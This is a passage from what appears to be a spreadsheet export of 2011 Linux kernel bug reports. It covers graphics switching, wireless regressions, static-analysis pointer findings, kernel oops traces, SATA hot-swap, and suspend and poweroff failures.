    <t>Created attachment 56262 [details] Kernel config Trying to setup script, that switches video cards, I ran into the situation when I left with a black screen not possible to do anything with the system. Here is an example: # cat /sys/kernel/debug/vgaswitcheroo/switch 0:IGD:+:Pwr:0000:01:05.0 1:DIS: :Pwr:0000:02:00.0 # echo IGD &gt; /sys/kernel/debug/vgaswitcheroo/switch # cat /sys/kernel/debug/vgaswitcheroo/switch 0:IGD:+:Off:0000:01:05.0 1:DIS: :Pwr:0000:02:00.0 I think that this behaviour is buggy and this should not happen. Environment: # lspci | grep -i vga 01:05.0 VGA compatible controller: ATI Technologies Inc RS780M/RS780MN [Radeon HD 3200 Graphics] 02:00.0 VGA compatible controller: ATI Technologies Inc M93 [Mobility Radeon HD 4500 Series] # uname -a Linux garik-laptop 2.6.39-rc5+ #8 SMP Sat Apr 30 18:36:12 MSD 2011 x86_64 AMD Athlon(tm) Neo Processor MV-40 AuthenticAMD GNU/Linux</t>
  </si>
  <si>
    <t>No ECN marking in IPv6</t>
  </si>
  <si>
    <t>2011-05-03 20:04 UTC</t>
  </si>
  <si>
    <t>2011-05-19 07:40 UTC</t>
  </si>
  <si>
    <t>Hi, I'm completely unable to get ECN to work for IPv6. /proc/sys/net/ipv4/tcp_ecn is set to 1 on both sides, and ECN works just fine for IPv4 TCP connections, but when I connect over IPv6 tclass just stays at 0x0, and as far as I'd understood, there should be two bits here set to 10 (like in the diffserv field of IPv4), right? I do get ECN-echo bits in the TCP header, though (for the initial SYN and SYN/ACK packets).</t>
  </si>
  <si>
    <t>iwl3945 ad-hoc mode crash with Thinkpad T60</t>
  </si>
  <si>
    <t>2.6.38.5</t>
  </si>
  <si>
    <t>2011-05-04 15:06 UTC</t>
  </si>
  <si>
    <t>2011-05-19 07:26 UTC</t>
  </si>
  <si>
    <t>2.6.38.5 started crashing with Thinkpad T60 when using adhoc mode wlan. 2.6.38.4 or older kernels work just fine. Have not managed to use magic sysreq to capture the crash to syslog. Traces: http://mcfrisk.kapsi.fi/temp/wlan_crash/adhoc_wlan_crash_dump_1.jpg http://mcfrisk.kapsi.fi/temp/wlan_crash/adhoc_wlan_crash_dump_2.jpg Kernel config: http://mcfrisk.kapsi.fi/temp/wlan_crash/kernel_config.txt hwinfo: http://mcfrisk.kapsi.fi/temp/wlan_crash/thinpad_t60_hwinfo.txt I will try to bisect this further, there seems to be only few changes in iwl3945 between .4 and .5</t>
  </si>
  <si>
    <t>Error-valued pointer overwrites in the Memory Management module</t>
  </si>
  <si>
    <t>2011-05-04 20:14 UTC</t>
  </si>
  <si>
    <t>Cindy Rubio</t>
  </si>
  <si>
    <t>2012-05-12 14:20 UTC</t>
  </si>
  <si>
    <t>Created attachment 56642 [details] Complete sample traces and slices describing error-valued pointer overwrites We have statically analyzed 52 Linux file system implementations, the VFS and the Memory Management module to find error-valued pointers that are overwritten without first being checked for errors. We have found three potential overwrites in two global variables and one local static variable: [1] mm/shmem.c:2579: overwriting potential non-tentative unchecked error in pointer variable "shm_mnt" [2] mm/shmem.c:2595: overwriting potential non-tentative unchecked error in pointer variable "shm_mnt" [3] mm/vmalloc.c:1271: overwriting potential non-tentative unchecked error in pointer variable "va" For each potential overwrite, our tool produces a complete sample trace and a corresponding slice. The complete sample trace illustrates how one error code may reach the program point at which the overwrite occurs. The slice summarizes the complete sample trace by including only relevant program points at which the error code is transferred from variable to variable or returned by a function. Sample traces and slices for the above overwrites are attached.</t>
  </si>
  <si>
    <t>Error-valued pointer overwrite in SCSI</t>
  </si>
  <si>
    <t>2011-05-04 20:37 UTC</t>
  </si>
  <si>
    <t>2012-05-12 14:17 UTC</t>
  </si>
  <si>
    <t>We have statically analyzed SCSI, the VFS and the Memory Management module to find error-valued pointers that are overwritten without first being checked for errors. We have found one potential overwrite: drivers/scsi/scsi_scan.c:639: overwriting potential non-tentative unchecked error in variable "*bflags", which may contain one of the following error codes: *EINVAL Here is a sample trace that illustrates how the overwrite might occur: include/linux/err.h:24: an unchecked error may be returned drivers/scsi/scsi_devinfo.c:268:"cabs2cil_" receives an error from function "ERR_PTR" drivers/scsi/scsi_devinfo.c:268:"tmp___8" receives an error from "cabs2cil_" drivers/scsi/scsi_devinfo.c:268:"tmp___8" may have an unchecked error drivers/scsi/scsi_devinfo.c:268:"tmp" receives an error from "tmp___8" drivers/scsi/scsi_devinfo.c:268:"tmp" may have an unchecked error drivers/scsi/scsi_devinfo.c:268:"tmp___7" receives an error from "tmp" drivers/scsi/scsi_devinfo.c:268:"tmp___7" may have an unchecked error drivers/scsi/scsi_devinfo.c:268: an unchecked error may be returned drivers/scsi/scsi_devinfo.c:477:"devinfo_table" receives an error from function "scsi_devinfo_lookup_by_key" drivers/scsi/scsi_devinfo.c:479:"devinfo_table" may have an unchecked error drivers/scsi/scsi_devinfo.c:480:"devinfo_table" may have an unchecked error include/linux/err.h:29: an unchecked error may be returned drivers/scsi/scsi_devinfo.c:480:"cabs2cil____0" receives an error from function "PTR_ERR" drivers/scsi/scsi_devinfo.c:480:"tmp___19" receives an error from "cabs2cil____0" drivers/scsi/scsi_devinfo.c:480:"tmp___17" receives an error from "tmp___19" drivers/scsi/scsi_devinfo.c:480:"tmp___7" receives an error from "tmp___17" drivers/scsi/scsi_devinfo.c:480: an unchecked error may be returned drivers/scsi/scsi_devinfo.c:451:"tmp___7" receives an error from function "scsi_get_device_flags_keyed" drivers/scsi/scsi_devinfo.c:451: an unchecked error may be returned drivers/scsi/scsi_scan.c:639:"*bflags" receives an error from function "scsi_get_device_flags" drivers/scsi/scsi_scan.c:644:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:645:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:646:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:655:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:656:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:657:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:658:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:573:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:578:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:581:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:582:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:583:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:585:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:587:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:592:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:596:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:603:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:605:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:609:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:578:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:581:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:582:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:583:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:585:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:587:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:592:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:596:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:603:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:620:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:623:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:624:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:625:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:626:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:628:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:629:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:630:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:639:"*bflags" may have an unchecked error drivers/scsi/scsi_scan.c:639: overwriting potential non-tentative unchecked error in variable "*bflags"</t>
  </si>
  <si>
    <t>WARNING: at include/linux/skbuff.h:457 ip_cmsg_recv_pktinfo+0xa6/0xb0</t>
  </si>
  <si>
    <t>2.6.39-rc6-00569-g5895198</t>
  </si>
  <si>
    <t>2011-05-06 12:15 UTC</t>
  </si>
  <si>
    <t>Witold Baryluk</t>
  </si>
  <si>
    <t>Created attachment 56822 [details] kernel configuration Hi. # uname -a Linux sredniczarny 2.6.39-rc6-00569-g5895198-dirty #22 SMP PREEMPT Thu May 5 20:10:35 CEST 2011 i686 GNU/Linux relevant part of dmesg: ------------[ cut here ]------------ WARNING: at include/linux/skbuff.h:457 ip_cmsg_recv_pktinfo+0xa6/0xb0() Hardware name: 2669UYD Modules linked in: isofs vboxnetadp vboxnetflt nfsd ebtable_nat ebtables lib80211_crypt_ccmp uinput xcbc hdaps tp_smapi thinkpad_ec radeonfb fb_ddc radeon ttm drm_kms_helper drm ipw2200 intel_agp intel_gtt libipw i2c_algo_bit i2c_i801 agpgart rng_core cfbfillrect cfbcopyarea cfbimgblt video raid10 raid1 raid0 linear md_mod vboxdrv Pid: 4697, comm: miredo Not tainted 2.6.39-rc6-00569-g5895198-dirty #22 Call Trace: [&lt;c17746b6&gt;] ? printk+0x1d/0x1f [&lt;c1058302&gt;] warn_slowpath_common+0x72/0xa0 [&lt;c15bbca6&gt;] ? ip_cmsg_recv_pktinfo+0xa6/0xb0 [&lt;c15bbca6&gt;] ? ip_cmsg_recv_pktinfo+0xa6/0xb0 [&lt;c1058350&gt;] warn_slowpath_null+0x20/0x30 [&lt;c15bbca6&gt;] ip_cmsg_recv_pktinfo+0xa6/0xb0 [&lt;c15bbdd7&gt;] ip_cmsg_recv+0x127/0x260 [&lt;c154f82d&gt;] ? skb_dequeue+0x4d/0x70 [&lt;c1555523&gt;] ? skb_copy_datagram_iovec+0x53/0x300 [&lt;c178e834&gt;] ? sub_preempt_count+0x24/0x50 [&lt;c15bdd2d&gt;] ip_recv_error+0x23d/0x270 [&lt;c15de554&gt;] udp_recvmsg+0x264/0x2b0 [&lt;c15ea659&gt;] inet_recvmsg+0xd9/0x130 [&lt;c1547752&gt;] sock_recvmsg+0xf2/0x120 [&lt;c11179cb&gt;] ? might_fault+0x4b/0xa0 [&lt;c15546bc&gt;] ? verify_iovec+0x4c/0xc0 [&lt;c1547660&gt;] ? sock_recvmsg_nosec+0x100/0x100 [&lt;c1548294&gt;] __sys_recvmsg+0x114/0x1e0 [&lt;c1093895&gt;] ? __lock_acquire+0x365/0x780 [&lt;c1148b66&gt;] ? fget_light+0xa6/0x3e0 [&lt;c1148b7f&gt;] ? fget_light+0xbf/0x3e0 [&lt;c1148aee&gt;] ? fget_light+0x2e/0x3e0 [&lt;c1549f29&gt;] sys_recvmsg+0x39/0x60 [&lt;c154a473&gt;] sys_socketcall+0x2d3/0x2f0 [&lt;c10bbcac&gt;] ? audit_syscall_entry+0x2ac/0x2d0 [&lt;c132ce98&gt;] ? trace_hardirqs_on_thunk+0xc/0x10 [&lt;c17921d8&gt;] sysenter_do_call+0x12/0x38 ---[ end trace 7d87d515c294ab32 ]--- ------------[ cut here ]------------ (before that there is essentially no strange things). easly reproductible, happens very often (from once a second to once a minute). # grep WARNING /var/log/messages | grep ip_cmsg_recv_pktinfo | wc -l 50 # Compiled using gcc-4.6.0-6 on Debian unstable. Thanks. PS. kerneloops.org looks to be dead, why oh why, it was nice and automated service.</t>
  </si>
  <si>
    <t>Block related crashes &amp; hangs in 2.6.39-rc5</t>
  </si>
  <si>
    <t>2011-05-07 18:13 UTC</t>
  </si>
  <si>
    <t>2011-05-14 21:46 UTC</t>
  </si>
  <si>
    <t>Subject : Block related crashes &amp; hangs in 2.6.39-rc5 Submitter : Ben Greear &lt;greearb@candelatech.com&gt; Date : 2011-05-02 17:26 Message-ID : 4DBEE960.7000801@candelatech.com References : http://marc.info/?l=linux-kernel&amp;m=130435723605923&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Warning at block/genhd.c:1556 disk_clear_events</t>
  </si>
  <si>
    <t>2011-05-07 18:17 UTC</t>
  </si>
  <si>
    <t>2011-06-28 07:52 UTC</t>
  </si>
  <si>
    <t>Subject : Warning at block/genhd.c:1556 disk_clear_events Submitter : Meelis Roos &lt;mroos@linux.ee&gt; Date : 2011-05-02 9:59 Message-ID : alpine.SOC.1.00.1105021255400.6200@math.ut.ee References : http://marc.info/?l=linux-kernel&amp;m=130433037002610&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>IO operation hang when plug in AC adapter</t>
  </si>
  <si>
    <t>2.6.39-rc5+</t>
  </si>
  <si>
    <t>2011-05-08 15:10 UTC</t>
  </si>
  <si>
    <t>2011-05-17 01:09 UTC</t>
  </si>
  <si>
    <t>My system have KDE and pm-utils-1.4.1 installed. When I plug in the AC adapter, any IO operation will hang. I cannot write dmesg into files because of IO hang so I shoot the screen: https://picasaweb.google.com/chaos.proton/Bugs Upon this bug happens, the disk led is on for a while than off for a while than on for an other while and back and forward... I seems there are fatal ata errors there. After I uninstalled pm-utils, things went OK. But the installed pm-utils is clean and AFAIS, the only thing it do is set link_power_management_policy to max_performance. If you couldn't see the screenshot clearly, I can attach the original ones.</t>
  </si>
  <si>
    <t>sata issue with nvidia / intel ahci (workaround = manually rescan port) hot swap does not work properly</t>
  </si>
  <si>
    <t>2011-05-08 20:48 UTC</t>
  </si>
  <si>
    <t>Reartes Guillermo</t>
  </si>
  <si>
    <t>2012-05-12 14:13 UTC</t>
  </si>
  <si>
    <t>I have two WD WD20EARS Green Adv. Fmt. drives Each of them has it's own NexStar CX enclosure (USB/eSATA). Each drive &amp; enclosure works ok on it own. They can be plugged, are recognized, are mountable, are u-mountable, no problems of any kind. Problem: I cannot hot-swap any of the disks with the other one. If i power off an enclosure and replace it with another one, i get: May 8 17:12:42 ulquiorra kernel: [ 9913.167921] ata5: exception Emask 0x10 SAct 0x0 SErr 0x5840000 action 0xe frozen May 8 17:12:42 ulquiorra kernel: [ 9913.167932] ata5: irq_stat 0x00000040, connection status changed May 8 17:12:42 ulquiorra kernel: [ 9913.167942] ata5: SError: { CommWake LinkSeq TrStaTrns DevExch } May 8 17:12:42 ulquiorra kernel: [ 9913.167958] ata5: limiting SATA link speed to 1.5 Gbps May 8 17:12:42 ulquiorra kernel: [ 9913.167966] ata5: hard resetting link May 8 17:12:48 ulquiorra kernel: [ 9918.940037] ata5: link is slow to respond, please be patient (ready=0) May 8 17:12:52 ulquiorra kernel: [ 9923.173258] ata5: COMRESET failed (errno=-16) May 8 17:12:52 ulquiorra kernel: [ 9923.173271] ata5: hard resetting link May 8 17:12:58 ulquiorra kernel: [ 9928.945419] ata5: link is slow to respond, please be patient (ready=0) May 8 17:13:02 ulquiorra kernel: [ 9933.183068] ata5: COMRESET failed (errno=-16) May 8 17:13:02 ulquiorra kernel: [ 9933.183081] ata5: hard resetting link May 8 17:13:08 ulquiorra kernel: [ 9938.909277] ata5: link is slow to respond, please be patient (ready=0) May 8 17:13:37 ulquiorra kernel: [ 9968.201074] ata5: COMRESET failed (errno=-16) May 8 17:13:37 ulquiorra kernel: [ 9968.201089] ata5: hard resetting link May 8 17:13:38 ulquiorra kernel: [ 9968.924046] ata5: SATA link down (SStatus 0 SControl 310) May 8 17:13:38 ulquiorra kernel: [ 9968.924069] ata5: EH complete Workaround: * power on, mount, use, umount the first enclosure. * power off the first enclosure (for example port ATA5) * issue '# echo "- - - " &gt; /sys/class/scsi_host/host4/scan' * power on the second enclosure (also port ATA5), it will be detected correclty. NOTE: The first time the port allways detects any disk correctly. If the port is not rescanned manually without drives attached, it is unusable. ---- Sata Controller: * nVidia Corporation MCP78S [GeForce 8200] AHCI Controller [10de:0ad4] (rev a2) OS: Fedora 15 beta kernel: 2.6.38.5-24.fc15.x86_64 HD1: WDC WD20EARS-00MVWB0, 50.0AB50 HD2: WDC WD20EARS-00MVWB0, 51.0AB51</t>
  </si>
  <si>
    <t>BUG: Null pointer dereference at fuse_dentry_revalidate</t>
  </si>
  <si>
    <t>2.6.39-rc6-00569-g5895198-dirty</t>
  </si>
  <si>
    <t>2011-05-09 13:09 UTC</t>
  </si>
  <si>
    <t>2011-05-14 21:45 UTC</t>
  </si>
  <si>
    <t>When ressuming from suspend I got: [168878.711615] IP: [&lt;c1286822&gt;] fuse_dentry_revalidate+0x82/0x320 [168878.711748] *pdpt = 000000002deb5001 *pde = 0000000000000000 [168878.711875] Oops: 0000 [#1] PREEMPT SMP [168878.711971] last sysfs file: /sys/devices/virtual/net/teredo/statistics/collisions [168878.712012] Modules linked in: ufs vfat fat isofs vboxnetadp vboxnetflt nfsd ebtable_nat ebtables lib80211_crypt_ccmp uinput xcbc hdaps tp_smapi thinkpad_ec radeonfb fb_ddc radeon ttm drm_kms_helper drm ipw2200 intel_agp intel_gtt libipw i2c_algo_bit i2c_i801 agpgart rng_core cfbfillrect cfbcopyarea cfbimgblt video raid10 raid1 raid0 linear md_mod vboxdrv [168878.712012] [168878.712012] Pid: 25504, comm: alarmclock Tainted: G W 2.6.39-rc6-00569-g5895198-dirty #22 IBM 2669UYD/2669UYD [168878.712012] EIP: 0060:[&lt;c1286822&gt;] EFLAGS: 00010282 CPU: 0 [168878.712012] EIP is at fuse_dentry_revalidate+0x82/0x320 [168878.712012] EAX: c9a96080 EBX: 00000000 ECX: 028313a5 EDX: 00000000 [168878.712012] ESI: 02295a2d EDI: 00000001 EBP: f4035d18 ESP: f4035c68 [168878.712012] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [168878.712012] Process alarmclock (pid: 25504, ti=f4034000 task=ce2587e0 task.ti=f4034000) [168878.712012] Stack: [168878.712012] 00000000 00000002 00000000 00000000 c115f708 ce2587e0 00000054 cc3ba5fc [168878.712012] c9a96080 00000054 c115f790 f4035cbc 00000246 00000001 c178e7cd 00000246 [168878.712012] f4035cb0 c1a28f30 cc3ba5fc 00000054 cc3ba5fc f4035d04 c115f7a9 00000002 [168878.712012] Call Trace: [168878.712012] [&lt;c115f708&gt;] ? __d_lookup+0xe8/0x230 [168878.712012] [&lt;c115f790&gt;] ? __d_lookup+0x170/0x230 [168878.712012] [&lt;c178e7cd&gt;] ? sub_preempt_count.part.170+0x4d/0x90 [168878.712012] [&lt;c115f7a9&gt;] ? __d_lookup+0x189/0x230 [168878.712012] [&lt;c115f620&gt;] ? __d_lookup_rcu+0x1f0/0x1f0 [168878.712012] [&lt;c115f87c&gt;] ? d_lookup+0x2c/0x50 [168878.712012] [&lt;c115239a&gt;] __lookup_hash.part.11+0x4a/0x90 [168878.712012] [&lt;c11524c4&gt;] lookup_one_len+0xe4/0x170 [168878.712012] [&lt;c1225fed&gt;] ecryptfs_lookup+0xfd/0x1b0 [168878.712012] [&lt;c11518f7&gt;] d_alloc_and_lookup+0x37/0x70 [168878.712012] [&lt;c1152e2b&gt;] do_lookup+0x18b/0x250 [168878.712012] [&lt;c12aa50d&gt;] ? security_inode_permission+0x1d/0x30 [168878.712012] [&lt;c115407b&gt;] link_path_walk+0x16b/0x900 [168878.712012] [&lt;c11554be&gt;] path_lookupat+0x4e/0x740 [168878.712012] [&lt;c1117a11&gt;] ? might_fault+0x91/0xa0 [168878.712012] [&lt;c11179cb&gt;] ? might_fault+0x4b/0xa0 [168878.712012] [&lt;c132d3f8&gt;] ? strncpy_from_user+0x38/0x70 [168878.712012] [&lt;c1155bdc&gt;] do_path_lookup+0x2c/0xb0 [168878.712012] [&lt;c115602b&gt;] user_path_at+0x3b/0x70 [168878.712012] [&lt;c178e430&gt;] ? do_page_fault+0x1d0/0x520 [168878.712012] [&lt;c114c1f9&gt;] vfs_fstatat+0x59/0x90 [168878.712012] [&lt;c114c250&gt;] vfs_lstat+0x20/0x30 [168878.712012] [&lt;c114c516&gt;] sys_lstat64+0x16/0x30 [168878.712012] [&lt;c178e7cd&gt;] ? sub_preempt_count.part.170+0x4d/0x90 [168878.712012] [&lt;c10bbcac&gt;] ? audit_syscall_entry+0x2ac/0x2d0 [168878.712012] [&lt;c132ce98&gt;] ? trace_hardirqs_on_thunk+0xc/0x10 [168878.712012] [&lt;c17921d8&gt;] sysenter_do_call+0x12/0x38 [168878.712012] Code: 01 00 00 00 8b 5d f4 89 d0 8b 75 f8 8b 7d fc 89 ec 5d c3 8d b6 00 00 00 00 0f 86 62 01 00 00 8b 85 70 ff ff ff 31 d2 85 c0 74 d9 &lt;f6&gt; 43 20 40 ba f6 ff ff ff 75 ce 8b 95 70 ff ff ff 8b 42 10 8b [168878.712012] EIP: [&lt;c1286822&gt;] fuse_dentry_revalidate+0x82/0x320 SS:ESP 0068:f4035c68 [168878.712012] CR2: 0000000000000020 [168878.784616] ---[ end trace 7d87d515c294ab86 ]--- # uname -a Linux sredniczarny 2.6.39-rc6-00569-g5895198-dirty #22 SMP PREEMPT Thu May 5 20:10:35 CEST 2011 i686 GNU/Linux # # (dirty only because of modified Makefile) compiled using gcc 4.6.0-3 on i386. # cat /proc/mounts rootfs / rootfs rw 0 0 none /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0 none /proc proc rw,nosuid,nodev,noexec,relatime 0 0 none /dev devtmpfs rw,relatime,size=1024196k,nr_inodes=216465,mode=755 0 0 none /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0 /dev/mapper/sredniczarny-root / ext4 rw,relatime,user_xattr,acl,barrier=1,nodelalloc,data=journal 0 0 tmpfs /lib/init/rw tmpfs rw,nosuid,relatime,mode=755 0 0 varrun /var/run tmpfs rw,nosuid,relatime,mode=755 0 0 varlock /var/lock tmpfs rw,nosuid,nodev,noexec,relatime 0 0 tmpfs /dev/shm tmpfs rw,nosuid,nodev,relatime 0 0 varrun /var/run tmpfs rw,nosuid,relatime,mode=755 0 0 varlock /var/lock tmpfs rw,nosuid,nodev,noexec,relatime 0 0 /dev/sda1 /boot ext3 rw,relatime,errors=continue,commit=5,barrier=1,data=ordered 0 0 /dev/mapper/sredniczarny-tmp /tmp ext4 rw,relatime,user_xattr,acl,barrier=1,data=ordered 0 0 /dev/mapper/sredniczarny-usr /usr ext4 rw,relatime,user_xattr,acl,barrier=1,nodelalloc,data=journal 0 0 /dev/mapper/sredniczarny-var /var ext4 rw,relatime,user_xattr,acl,barrier=1,nodelalloc,data=journal 0 0 /dev/mapper/sredniczarny-home /home ext4 rw,relatime,user_xattr,acl,barrier=1,nodelalloc,data=journal 0 0 fusectl /sys/fs/fuse/connections fusectl rw,relatime 0 0 sctank2 /sctank2 fuse rw,relatime,user_id=0,group_id=0,allow_other 0 0 sctank2/Books /sctank2/Books fuse rw,relatime,user_id=0,group_id=0,allow_other 0 0 sctank2/Dane /sctank2/Dane fuse rw,relatime,user_id=0,group_id=0,allow_other 0 0 sctank2/Download /sctank2/Download fuse rw,relatime,user_id=0,group_id=0,allow_other 0 0 sctank2/Filmy /sctank2/Filmy fuse rw,relatime,user_id=0,group_id=0,allow_other 0 0 sctank2/Muzyka /sctank2/Muzyka fuse rw,relatime,user_id=0,group_id=0,allow_other 0 0 sctank2/MuzykaMod /sctank2/MuzykaMod fuse rw,relatime,user_id=0,group_id=0,allow_other 0 0 sctank2/Projekty /sctank2/Projekty fuse rw,relatime,user_id=0,group_id=0,allow_other 0 0 sctank2/Studia /sctank2/Studia fuse rw,relatime,user_id=0,group_id=0,allow_other 0 0 sctank2/System /sctank2/System fuse rw,relatime,user_id=0,group_id=0,allow_other 0 0 sctank2/Users /sctank2/Users fuse rw,relatime,user_id=0,group_id=0,allow_other 0 0 sctank2/Users/baryluk /sctank2/Users/baryluk fuse rw,relatime,user_id=0,group_id=0,allow_other 0 0 sctank2/Users/baryluk-www /sctank2/Users/baryluk-www fuse rw,relatime,user_id=0,group_id=0,allow_other 0 0 sctank2/Users/baryluk-www/osis-attachments /sctank2/Users/baryluk-www/osis-attachments fuse rw,relatime,user_id=0,group_id=0,allow_other 0 0 sctank2/Users/baryluk/.Private /sctank2/Users/baryluk/.Private fuse rw,relatime,user_id=0,group_id=0,allow_other 0 0 sctank2/Users/baryluk/.wine_drive_c /sctank2/Users/baryluk/.wine_drive_c fuse rw,relatime,user_id=0,group_id=0,allow_other 0 0 sctank2/Users/scpguest /sctank2/Users/scpguest fuse rw,relatime,user_id=0,group_id=0,allow_other 0 0 sctank2/VMs /sctank2/VMs fuse rw,relatime,user_id=0,group_id=0,allow_other 0 0 binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw,nosuid,nodev,noexec,relatime 0 0 cgroup /sys/fs/cgroup cgroup rw,relatime,cpu 0 0 cgroup /sys/fs/cgroup/cpuacct cgroup rw,relatime,cpuacct 0 0 cgroup /sys/fs/cgroup/devices cgroup rw,relatime,devices 0 0 nfsd /proc/fs/nfsd nfsd rw,relatime 0 0 /dev/sr0 /media/cdrom0 iso9660 ro,relatime 0 0 /home/baryluk/.Private /home/baryluk/Private ecryptfs rw,relatime,ecryptfs_fnek_sig=ca3ffc95d0fb0164,ecryptfs_sig=e4765846879e2bfb,ecryptfs_cipher=aes,ecryptfs_key_bytes=16 0 0 # .config attached.</t>
  </si>
  <si>
    <t>Regression with ath5k, cannot find any wireless network</t>
  </si>
  <si>
    <t>2.6.38.x</t>
  </si>
  <si>
    <t>2011-05-12 11:24 UTC</t>
  </si>
  <si>
    <t>2011-07-09 07:40 UTC</t>
  </si>
  <si>
    <t>Created attachment 57542 [details] dmesg with DEBUG=Y Description: My ath5k based card was working perfectly until I upgraded to the kernel-2.6.38.5-24.fc15.x86_64. Now it cannot see any wireless network. `iwlist wlan0 scan` returns "no wireless found" I tested this with the latest compat-wireless-2011-05-11 and DEBUG=Y without luck. The log/debug files are attached. Device: 08:04.0 Ethernet controller: Atheros Communications Inc. AR2413 802.11bg NIC (rev 01) Subsystem: AMBIT Microsystem Corp. Device 0418 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 168 (2500ns min, 7000ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 21 Region 0: Memory at c0200000 (32-bit, non-prefetchable) [size=64K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=2 PME- Kernel driver in use: ath5k Kernel modules: ath5k Latest working kernel: kernel-2.6.37-2.fc15 First non-wokring kernel: kernel-2.6.38-0.rc2.git0.1.fc15</t>
  </si>
  <si>
    <t>hid_magicmouse broken</t>
  </si>
  <si>
    <t>2.6.39-rc6</t>
  </si>
  <si>
    <t>2011-05-13 14:47 UTC</t>
  </si>
  <si>
    <t>2012-01-12 21:25 UTC</t>
  </si>
  <si>
    <t>Bluetooth magicmouse works with kernel 2.6.38, whereas 2.6.39 (as far as i remember, started before rc6) gives : input: Souris de lal as /devices/pci0000:00/0000:00:1a.7/usb1/1-1/1-1.1/1-1.1.1/1-1.1.1:1.0/bluetooth/hci0/hci0:11/input13 magicmouse 0005:05AC:030D.0008: input,hidraw4: BLUETOOTH HID v3.06 Mouse [Souris de lal] on 44:2A:60:CD:FD:7D magicmouse 0005:05AC:030D.0008: unable to request touch data (-5) magicmouse: probe of 0005:05AC:030D.0008 failed with error -5 and mouse is not working at all. Sometimes, repairing fixes the issue, but most of the time it doesn't. Feel free to ask me for more info. Jérémy.</t>
  </si>
  <si>
    <t>Poweroff works as Reboot for NVIDIA based board</t>
  </si>
  <si>
    <t>2.6.37 and above</t>
  </si>
  <si>
    <t>2011-05-13 15:00 UTC</t>
  </si>
  <si>
    <t>Yury Siamashka</t>
  </si>
  <si>
    <t>Created attachment 57732 [details] lspci -v output After upgrading kernel from 2.6.36 to 2.6.37 my board is unable to poweroff. Computer just reboot when I run "poweroff" command I bisect the problem and found that commit: 3df7169e73fc1d71a39cffeacc969f6840cdf52b OHCI: work around for nVidia shutdown problem cause the problem. my lspci output is attached</t>
  </si>
  <si>
    <t>Suspend to ram stopped working after commit of " intel-iommu: Unlink domain from iommu "</t>
  </si>
  <si>
    <t>2011-05-14 11:08 UTC</t>
  </si>
  <si>
    <t>optiluca</t>
  </si>
  <si>
    <t>2011-06-12 20:44 UTC</t>
  </si>
  <si>
    <t>Hi. When upgrading from kernel 2.6.38.4 to 2.6.38.5, suspend to ram stopped working on my Thinkpad W510. I ran a git bisection and found the issue to have begun with the commit " intel-iommu: Unlink domain from iommu " (commit a97590e56d0d58e1dd262353f7cbd84e81d8e600 ) http://lkml.org/lkml/2011/4/29/308 When suspending from X, the system blanks the screen, but hangs before switching off the backlight. When suspending from console, the kernel spews out a long error message ending with "segmentation fault", and hangs. I apologize for the lack of information, this is the first time I report a bug here. If there is something else you need to know, please ask :) BTW, here are some hardware / system details: lspci 00:00.0 Host bridge: Intel Corporation Core Processor DMI (rev 11) 00:03.0 PCI bridge: Intel Corporation Core Processor PCI Express Root Port 1 (rev 11) 00:08.0 System peripheral: Intel Corporation Core Processor System Management Registers (rev 11) 00:08.1 System peripheral: Intel Corporation Core Processor Semaphore and Scratchpad Registers (rev 11) 00:08.2 System peripheral: Intel Corporation Core Processor System Control and Status Registers (rev 11) 00:08.3 System peripheral: Intel Corporation Core Processor Miscellaneous Registers (rev 11) 00:10.0 System peripheral: Intel Corporation Core Processor QPI Link (rev 11) 00:10.1 System peripheral: Intel Corporation Core Processor 